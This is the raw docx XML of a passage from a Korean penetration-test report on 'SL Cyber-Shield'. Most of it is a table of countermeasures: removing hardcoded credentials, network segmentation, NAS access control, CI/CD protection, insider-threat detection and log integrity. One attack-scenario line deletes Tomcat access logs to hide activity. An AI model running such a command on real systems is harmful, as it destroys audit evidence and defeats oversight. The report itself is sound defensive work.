            <w:shd w:fill="1E1E1E" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rm -f /var/log/tomcat*/access_log.*    # 접근 로그 삭제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3"/>
        </w:rPr>
        <w:t>6-n. 대응 방안 (시나리오 2)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929"/>
        <w:gridCol w:w="2929"/>
        <w:gridCol w:w="2929"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>취약점/항목</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>위험도</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>대응 방안</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>하드코딩 크리덴셜 제거</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
            <w:shd w:fill="FDECEA" w:val="clear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5783"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>• 소스코드 및 설정 파일에 DB 접속 정보 등 민감 데이터를 직접 기재하지 않음</w:t>
              <w:br/>
              <w:t>• HashiCorp Vault, AWS Secrets Manager 등 비밀 관리 솔루션 도입</w:t>
              <w:br/>
              <w:t>• GitGuardian, Gitleaks 등 비밀 스캐너를 CI/CD 파이프라인에 통합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내부망 서비스 접근 통제</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="FFF3CD" w:val="clear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• 컨테이너/서버 간 네트워크 분리: DB 포트를 앱 서버에서만 접근 가능하도록 방화벽/네트워크 정책 설정</w:t>
              <w:br/>
              <w:t>• TeamCity, Gitea 등 CI/CD 인프라에 VPN 또는 제로 트러스트 기반 접근 통제 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NAS 접근 통제 강화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
            <w:shd w:fill="FFF3CD" w:val="clear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5783"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>• SMB 게스트 및 익명 접근 완전 차단</w:t>
              <w:br/>
              <w:t>• 파일 서버 접근 이력 로그 수집 및 SIEM 연동</w:t>
              <w:br/>
              <w:t>• 중요 파일에 대한 DRM(디지털 저작권 관리) 및 DLP 정책 적용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CI/CD 파이프라인 보안</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="FDECEA" w:val="clear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• 코드 변경 시 Pull Request 기반 리뷰 및 승인 프로세스 필수화</w:t>
              <w:br/>
              <w:t>• 브랜치 보호 정책(Branch Protection)으로 main 브랜치 직접 push 차단</w:t>
              <w:br/>
              <w:t>• 빌드/배포 파이프라인 변경 이벤트에 대한 알림 및 감사 로그 수집</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>내부자 위협 탐지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
            <w:shd w:fill="FFF3CD" w:val="clear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5783"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>• UBA(User Behavior Analytics): 비정상적인 대용량 파일 접근, 야간 활동 등 탐지</w:t>
              <w:br/>
              <w:t>• SIEM 규칙: git force push, 설정 파일 대량 접근, DB 전체 덤프 등 이상 행위 알럿</w:t>
              <w:br/>
              <w:t>• 특권 계정(PAM) 솔루션으로 관리자 권한 사용 세션 녹화 및 감사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로그 무결성 보호</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="EBF3FB" w:val="clear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• 서버 로그를 외부 SIEM/로그 서버로 실시간 전송하여 로컬 삭제 방지</w:t>
              <w:br/>
              <w:t>• git 이력 변조 감지: 중앙 저장소에서 force push 알림 설정</w:t>
              <w:br/>
              <w:t>• 감사 로그(auditd) 활성화로 파일 삭제, 명령어 실행 이력 보호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070"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>SL Cyber-Shield (SCS-EP) 보안 테스트 보고서  |  2026-03-28  |  SL Factory Innovation Team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